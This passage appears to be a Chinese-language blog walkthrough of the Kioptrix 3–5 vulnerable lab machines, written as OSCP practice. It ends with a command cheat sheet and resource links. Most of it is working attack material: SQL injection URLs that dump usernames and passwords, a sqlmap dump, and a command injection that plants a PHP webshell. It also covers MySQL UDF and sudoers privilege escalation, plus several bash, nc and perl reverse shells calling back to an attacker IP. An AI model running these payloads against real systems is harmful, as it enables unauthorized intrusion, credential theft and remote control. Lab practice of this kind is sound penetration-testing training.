information_schema.tables where table_schema=database()--+&sort=photoid#photos暴列http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name='gallarific_users'--+&sort=photoid#photos暴数据,得到账号密码,admin::n0t7t1k4http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,group_concat(username,'::',password),3,4,5,6 from gallarific_users --+&sort=photoid#photos登录看看,密码错误切换这个用户试试,也不行同理,查,dev_accounts这张表http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,group_concat(username,'::',password),3,4,5,6 from dev_accounts --+&sort=photoid#photos这样我们就看到了账号密码了,识别hashhash碰撞失败换一换其他工具转在线工具https://www.cmd5.com/default.aspx密码为starwars,登录成功sudo -l添加环境变量export TERM=xterm按 F3 或者 ALT+W 然后 方向键← ← ↓ 回车框中 输入/etc/sudoers保存退出sudo /bin/sh id提权成功第二种方法,就是用4089.c进行提权,第一个40616行不通,测试40839.c可行level 4主机发现curl判断80开启nmap扫描后,立马开始目录扫描弱口令,sql注入,admin/admin,123' and 1=1 --+这里有一个铭感文件泄露密码爆破myusernamemypasswordcookie伪造,也不行用nmap的 --script=vuln 参数试试,找找漏洞信息CVE-2007-6750拒绝服务攻击再回去看看目录,有一个database.sql文件,看样子是信息泄露了,看到了一条数据,但是还是登录失败没有思路了,再重头来一遍,在登录的地方密码处,存在一个sql注入漏洞,123' and 1=1 --+没有回显啊,不可能手工盲注啊,无奈了只能用sqlmapsqlmap -r post.txt --dump --batch --level 3登录进去后没有任何东西,就一个退出登录试试ssh登录# 注意这里要加一个参数,不然会登录失败,应该是目标靶机ssh版本低所导致的 ssh -o HostKeyAlgorithms=+ssh-rsa john@192.168.111.186两个账号都登录成功了一开始就有一个提示了,让我们使用help命令,似乎是只能使用这些命令来进行接下来的操作shell逃逸可以看到root用户启动了一个mysql进程suid文件查看,貌似没有可以利用的提权命令,sudo这些用户都不能用已知站点是php站点,查找一下php的文件,看看有没有可以利用的地方,比如mysql配置文件查找登录界面的信息,看到了mysql的账号密码(没有密码)登录mysql的提权方式有一个叫做udf提权,我们去看看udf表利用 sys_exec()函数将john用户添加到管理员组。sudo su (用于切换到超级用户"root"的shell)输入账号密码,提权成功level 5 Kioptrix2014同时进行,nmap主机探测立马nmap指纹识别,后curl 80探测,第三个终端目录扫描首页查看响应的源码访问,不知道是什么东西,应该是目录枚举了,和我们获取权限没有什么关系直接搜,刚好版本是一模一样的这里有漏洞的利用方式访问到文件信息了,任意文件查看看看其他信息,操作系统为FreeBSD编译后的exp提示,是没有apache 2.2.x版本的,所以第一关里面的方法利用不了了看其他信息,有一个8080端口403拒绝访问去看看apache配置文件(一般都在/usr/local/etc/apache2x/httpd.conf),利用刚刚的文件枚举漏洞,查看正常访问了,有一个phptax页面又是一个新页面随便点一点试试关键检索,有一个代码执行漏洞查看24665.txt访问后,应该是没有nc,执行不了命令/bin/bash -i >& /dev/tcp/192.168.111.128/8888 0>&1 nc 192.168.111.128 8888 -e /bin/bash写入一句话马试试http://192.168.111.149:8080/phptax/drawimage.php?pfilez=1040pg1.pdf;echo "<?php system($_GET['cmd']); ?>" > shell1.php;&pdf=make# 反弹不了命令,就多试几个,总有一个能用 perl -e 'use Socket;$i="192.168.111.128";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.111.128:8888");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'这里使用的是 perl sh反弹成功了目标靶机上没有python,创建不了交互式终端,但是并不影响我们提权查内核信息查SUID文件,基本的sudo都没有,去检索内核根据内核信息有俩个权限提升漏洞这里看靶机是没有wget和curl的,但是有nc小知识,nc也是可以传文件的(测试过很多遍,没传成功),还有个技巧就是利用ftp# 攻击机开启ftp python3 -m pyftpdlib # 靶机连接 ftp ftp://192.168.111.128:2121/file搞了半天,kali新版的python的开不了,人麻了,传到本机来开成功传上去了exp传上去后gcc -o exp exploit.c ./exp即可提权成功,我这里环境出问题了,显示不了了怎么创建交互式终端都不行,害命令小姐# 创建交互式终端的几种方式 echo os.system("/bin/bash") python -c "import pty; pty.spawn('/bin/bash')" /bin/sh -i gcc -o exp xxx.c # c文件编译,-o表示的是输出的文件名称 python -m http.server # 开启小型的http服务 python3 -m ptyftpdlib # 开启小型的ftp服务器 ftp ftp://ip:port/file #使用ftp接收文件 # 常用的反弹shell /bin/bash -i >& /dev/tcp/192.168.111.128/8888 0>&1 nc 192.168.111.128 8888 -e /bin/bash # 注意这里要加一个参数,不然会登录失败,应该是目标靶机ssh版本低所导致的 ssh -o HostKeyAlgorithms=+ssh-rsa john@192.168.111.186 usermod -a -G admin john # 将john用户添加到admin组 # mysql提权(udf提权)用到的表(查) select * from mysql.func; select sys_exec('commend'); uname -a # 查看系统的全部信息哪些好的资料可以分享?我在学习和备考的时候参考的一些不错的资源,汇总如下:注册指南:《OSCP认证教程第一集:注册教程》https://www.freebuf.com/column/194605.htmlLinux提权指南:https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/Windows提权辅助脚本:https://github.com/pentestmonkey/windows-privesc-check模拟练习平台(跟Lab环境类似):vulnhub https://www.vulnhub.com/ hackthebox https://www.hackthebox.eu/badchars工具:https://github.com/mgeeky/expdevBadChars往期推荐不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学防溯源小技巧ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS【渗透测试】Linux隐身登录
2025年05月18日
1,009 阅读
0 评论
0 点赞
1
...
22
23
24
...
37